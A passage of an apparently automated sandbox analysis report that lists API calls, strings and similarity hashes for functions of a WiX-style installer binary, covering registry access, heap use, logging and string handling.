                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                • String ID: strutil.cpp
                                                                                                                • API String ID: 3662877508-3612885251
                                                                                                                • Opcode ID: 1384de4077983718940608762c5f6fceea8567a3d10897ac11b2453b7552d48b
                                                                                                                • Instruction ID: 082a7db0b4def6f3920f7048dfc0ed35977b52b44301e1f0fa7a9a9af92638f1
                                                                                                                • Opcode Fuzzy Hash: 1384de4077983718940608762c5f6fceea8567a3d10897ac11b2453b7552d48b
                                                                                                                • Instruction Fuzzy Hash: 45311A32604226ABD7288FADCC44B6B3B99AF47774B214224FD259F290E775DC0097D0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 009E95D5
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 009E9610
                                                                                                                • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 009E962C
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 009E9639
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 009E9646
                                                                                                                  • Part of subcall function 009E0FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009E95C2,00000001), ref: 009E0FED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$InfoOpenQuery
                                                                                                                • String ID:
                                                                                                                • API String ID: 796878624-0
                                                                                                                • Opcode ID: 77c96299f15fc13b1b23df22c3a18a77819c06310c5475664bd2229aca42df3c
                                                                                                                • Instruction ID: 3dbf1b74b83589185b8ce3b72c9bab426e635fc006eb2278882ead16c77fab41
                                                                                                                • Opcode Fuzzy Hash: 77c96299f15fc13b1b23df22c3a18a77819c06310c5475664bd2229aca42df3c
                                                                                                                • Instruction Fuzzy Hash: 4D415D72C0126DFFCF23AF96CC819ADFBB9EF58B54F11416AE91076221C7714E509A90
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,009A8BC8,009A972D,?,009A972D,?,?,009A972D,?,?), ref: 009A8A27
                                                                                                                • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,009A8BC8,009A972D,?,009A972D,?,?,009A972D,?,?), ref: 009A8A2F
                                                                                                                • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,009A8BC8,009A972D,?,009A972D,?), ref: 009A8A7E
                                                                                                                • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,009A8BC8,009A972D,?,009A972D,?), ref: 009A8AE0
                                                                                                                • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,009A8BC8,009A972D,?,009A972D,?), ref: 009A8B0D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString$lstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1657112622-0
                                                                                                                • Opcode ID: b630b6953c9a258c35d6ce3ac57ee39ab702de3d10e5186fc50978cf2b8da578
                                                                                                                • Instruction ID: 3319ffbb8e295e424b45dfa5561ee18c4fc97dcec6219c2c8939e658dcec3973
                                                                                                                • Opcode Fuzzy Hash: b630b6953c9a258c35d6ce3ac57ee39ab702de3d10e5186fc50978cf2b8da578
                                                                                                                • Instruction Fuzzy Hash: 65316372A05158FFCF218F98CC89AAF3F6EEB4A350F154416F9198B520CA759D90DBE0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(009A53BD,WixBundleOriginalSource,?,?,009BA623,840F01E8,WixBundleOriginalSource,?,00A0AA90,?,00000000,009A5445,00000001,?,?,009A5445), ref: 009A74C3
                                                                                                                • LeaveCriticalSection.KERNEL32(009A53BD,009A53BD,00000000,00000000,?,?,009BA623,840F01E8,WixBundleOriginalSource,?,00A0AA90,?,00000000,009A5445,00000001,?), ref: 009A752A
                                                                                                                Strings
                                                                                                                • Failed to get value of variable: %ls, xrefs: 009A74FD
                                                                                                                • WixBundleOriginalSource, xrefs: 009A74BF
                                                                                                                • Failed to get value as string for variable: %ls, xrefs: 009A7519
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                                                                • API String ID: 3168844106-30613933
                                                                                                                • Opcode ID: 0151957e9bff5dc811088dfa17eec5f6a2384198e4e4308be225cf2506e5f838
                                                                                                                • Instruction ID: 158a7421516aa5230caab07f25daa3b83d3df230c8349ce529c5faf12894d846
                                                                                                                • Opcode Fuzzy Hash: 0151957e9bff5dc811088dfa17eec5f6a2384198e4e4308be225cf2506e5f838
                                                                                                                • Instruction Fuzzy Hash: BB019A72D48169FBCF229E84CC06A9EBB68EF02325F104160FD04AA220C3369E11ABD0
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,?,009CD148,00000000), ref: 009CD16D
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,009CD148,00000000), ref: 009CD179
                                                                                                                • CloseHandle.KERNEL32(009EB518,00000000,?,00000000,?,009CD148,00000000), ref: 009CD186
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,009CD148,00000000), ref: 009CD193
                                                                                                                • UnmapViewOfFile.KERNEL32(009EB4E8,00000000,?,009CD148,00000000), ref: 009CD1A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$FileUnmapView
                                                                                                                • String ID:
                                                                                                                • API String ID: 260491571-0
                                                                                                                • Opcode ID: 75aa6530252ae7c635c18fb0811ed209f390a06dfa5ac314e970a9af3783fc12
                                                                                                                • Instruction ID: 0ef90e666270170a0cbd3bea1e94bc803c08df97cf9f2029a39ade7c6ed5414f
                                                                                                                • Opcode Fuzzy Hash: 75aa6530252ae7c635c18fb0811ed209f390a06dfa5ac314e970a9af3783fc12
                                                                                                                • Instruction Fuzzy Hash: 5601F672806B16DFCB31AF66D890916F7E9AF50711319C93EE2AA52930C371A980DF41
                                                                                                                APIs
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 009E8820
                                                                                                                • GetLastError.KERNEL32 ref: 009E882A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$ErrorFileLastSystem
                                                                                                                • String ID: clbcatq.dll$timeutil.cpp
                                                                                                                • API String ID: 2781989572-961924111
                                                                                                                • Opcode ID: 0c9358d3b0707fb7f494e120d5ea9437a76e1a17f953b071eb2a8add489c978e
                                                                                                                • Instruction ID: 68d76cde644c0106886074af6b09fe76b61a5cc1a468a555b3e95c2d0b706053
                                                                                                                • Opcode Fuzzy Hash: 0c9358d3b0707fb7f494e120d5ea9437a76e1a17f953b071eb2a8add489c978e
                                                                                                                • Instruction Fuzzy Hash: A5411776E50295B6D7229BFA8C45B7F7768AF81700F54492AF915B7280E935CE00C3A1
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(000002C0), ref: 009E36E6
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 009E36F6
                                                                                                                • VariantClear.OLEAUT32(?), ref: 009E37D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$AllocClearInitString
                                                                                                                • String ID: xmlutil.cpp
                                                                                                                • API String ID: 2213243845-1270936966
                                                                                                                • Opcode ID: 982b2d2bd10e6a43f666dab75a7a4555169fa65a2d8ee1ed8b951f92cddca7e0
                                                                                                                • Instruction ID: ec049435309ab979e15f003839687805eee42344ab921108972ac30d319a53e5
                                                                                                                • Opcode Fuzzy Hash: 982b2d2bd10e6a43f666dab75a7a4555169fa65a2d8ee1ed8b951f92cddca7e0
                                                                                                                • Instruction Fuzzy Hash: 5B4157B5900269ABCB119FA5C88CEAFBBBCAF45710F1585A4FC15EB211D635DE008B91
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,009C8E1B), ref: 009E0EAA
                                                                                                                • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009C8E1B,00000000), ref: 009E0EC8
                                                                                                                • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,009C8E1B,00000000,00000000,00000000), ref: 009E0F1E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Enum$InfoQuery
                                                                                                                • String ID: regutil.cpp
                                                                                                                • API String ID: 73471667-955085611
                                                                                                                • Opcode ID: 34954bc62a47acbe078766723c69e92bd63e6e1b23106610ae600c433c6a1de1
                                                                                                                • Instruction ID: cc8a82da6c3a13e7cd3c98c497ce61dbd7388cb383eeffe2fdbcd5071872857f
                                                                                                                • Opcode Fuzzy Hash: 34954bc62a47acbe078766723c69e92bd63e6e1b23106610ae600c433c6a1de1
                                                                                                                • Instruction Fuzzy Hash: 5631C67690116DFFDB228BC68D80EAFB76CEF84750F150865BD04AB210D7B18E9096E0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,009C8E57,00000000,00000000), ref: 009C8BD4
                                                                                                                Strings
                                                                                                                • Failed to initialize package from related bundle id: %ls, xrefs: 009C8BBA
                                                                                                                • Failed to ensure there is space for related bundles., xrefs: 009C8B87
                                                                                                                • Failed to open uninstall key for potential related bundle: %ls, xrefs: 009C8B43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen
                                                                                                                • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                • API String ID: 47109696-1717420724
                                                                                                                • Opcode ID: 2181b9dbe85e9b6398407a3171a91d4ac137619693e8a95b1312e3949c748357
                                                                                                                • Instruction ID: 2dd4fa56dcad8e6fff16ad26a893ba42e94715d5d0e4fd8f4b67d24f5172528b
                                                                                                                • Opcode Fuzzy Hash: 2181b9dbe85e9b6398407a3171a91d4ac137619693e8a95b1312e3949c748357
                                                                                                                • Instruction Fuzzy Hash: EE21AF72D4021AFBDF129E80CC4AFAFBB78EF44711F104459FA00A6160DB759E20EB91
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,009A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009A13B8), ref: 009A3B33
                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,009A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009A13B8,000001C7,00000100,?,80004005,00000000), ref: 009A3B3A
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                  • Part of subcall function 009A3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009A21CC,000001C7,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3BDB
                                                                                                                  • Part of subcall function 009A3BD3: HeapSize.KERNEL32(00000000,?,009A21CC,000001C7,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3BE2
                                                                                                                • _memcpy_s.LIBCMT ref: 009A3B86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                                                                • String ID: memutil.cpp
                                                                                                                • API String ID: 3406509257-2429405624
                                                                                                                • Opcode ID: 294c4d5f988723ad1b9cb64a9a43e0802d3367221739fc2843dbb7b276ac0d59
                                                                                                                • Instruction ID: c67be0cd4692cba5154d59558037d50622dc6b1ae45a648a67145a8577c66f76
                                                                                                                • Opcode Fuzzy Hash: 294c4d5f988723ad1b9cb64a9a43e0802d3367221739fc2843dbb7b276ac0d59
                                                                                                                • Instruction Fuzzy Hash: E111E131A04219ABCB226E68CC48E7F3A5FDB82760B05C225FC149B2A2D735CF1093F0
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32 ref: 009E8991
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009E89B9
                                                                                                                • GetLastError.KERNEL32 ref: 009E89C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastTime$FileSystem
                                                                                                                • String ID: inetutil.cpp
                                                                                                                • API String ID: 1528435940-2900720265
                                                                                                                • Opcode ID: 37e197ef8d4c8d8f529c266beeb1c7f72eaf42b4a97e81a4c613bdc5ab829d59
                                                                                                                • Instruction ID: 5d0c0e87448f88b2a88cb3b51a599505d905f139372f4f1933d5f10dfb8726e5
                                                                                                                • Opcode Fuzzy Hash: 37e197ef8d4c8d8f529c266beeb1c7f72eaf42b4a97e81a4c613bdc5ab829d59
                                                                                                                • Instruction Fuzzy Hash: C811D337E11229B7D321DAEACD45BBFBBACAF44750F110515AE45FB241EA249D0086E2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,009B3FB5,feclient.dll,?,00000000,?,?,?,009A4B12), ref: 009B3B42
                                                                                                                  • Part of subcall function 009E10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009E112B
                                                                                                                  • Part of subcall function 009E10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 009E1163
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                • API String ID: 1586453840-3596319545
                                                                                                                • Opcode ID: baf195c8c63bc85d7a5146d548e7941725e4a632bbc4531d29b7503d629368d6
                                                                                                                • Instruction ID: 4197340f15d393ec2fc36ef73bb14069060b4e16a08ed3c8d43177aa72da60db
                                                                                                                • Opcode Fuzzy Hash: baf195c8c63bc85d7a5146d548e7941725e4a632bbc4531d29b7503d629368d6
                                                                                                                • Instruction Fuzzy Hash: BA11C836B40218BBDB21DB96DE82EFFBBBCEB40720F508065E6009B055D6719F81D750
                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(009C12CF,00000000,00000000,?,?,?,009E0013,009C12CF,009C12CF,?,00000000,0000FDE9,?,009C12CF,8007139F,Invalid operation for this state.), ref: 009E0776
                                                                                                                • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,009E0013,009C12CF,009C12CF,?,00000000,0000FDE9,?,009C12CF,8007139F), ref: 009E07B2
                                                                                                                • GetLastError.KERNEL32(?,?,009E0013,009C12CF,009C12CF,?,00000000,0000FDE9,?,009C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009E07BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWritelstrlen
                                                                                                                • String ID: logutil.cpp
                                                                                                                • API String ID: 606256338-3545173039
                                                                                                                • Opcode ID: 7131369697999db271d4b0f75f87fae927dc526b3bb8147b3f94ebb15598b3a9
                                                                                                                • Instruction ID: 711893be4bed65faa623101a636e9acfac8a939dd8a1fb4b9a92cb28f2d89e98
                                                                                                                • Opcode Fuzzy Hash: 7131369697999db271d4b0f75f87fae927dc526b3bb8147b3f94ebb15598b3a9
                                                                                                                • Instruction Fuzzy Hash: E111CA72900269ABC311CAAB9D84AAFBA6CFBC5760B014624FD01DB140E7B1BD40C9E0
                                                                                                                APIs
                                                                                                                • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,009A523F,00000000,?), ref: 009A1248
                                                                                                                • GetLastError.KERNEL32(?,?,?,009A523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 009A1252
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArgvCommandErrorLastLine
                                                                                                                • String ID: apputil.cpp$ignored
                                                                                                                • API String ID: 3459693003-568828354
                                                                                                                • Opcode ID: f0783ff1deaa71a8b45092071affce8be6a36c9c2b6bb91641cde075c8288d33
                                                                                                                • Instruction ID: 1c53073fdfef4878cb39aa049974b0a9829370a0d2d11ade62c7b11d3603508b
                                                                                                                • Opcode Fuzzy Hash: f0783ff1deaa71a8b45092071affce8be6a36c9c2b6bb91641cde075c8288d33
                                                                                                                • Instruction Fuzzy Hash: 69113D76901629AB8B21DBD9C845E9FBBACAF86B50F114155FD14EB250EA30DE00DAE0
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,009CD3EE,00000000,00000000,00000000,?), ref: 009CD1C3
                                                                                                                • ReleaseMutex.KERNEL32(?,?,009CD3EE,00000000,00000000,00000000,?), ref: 009CD24A
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                Strings
                                                                                                                • Failed to allocate memory for message data, xrefs: 009CD212
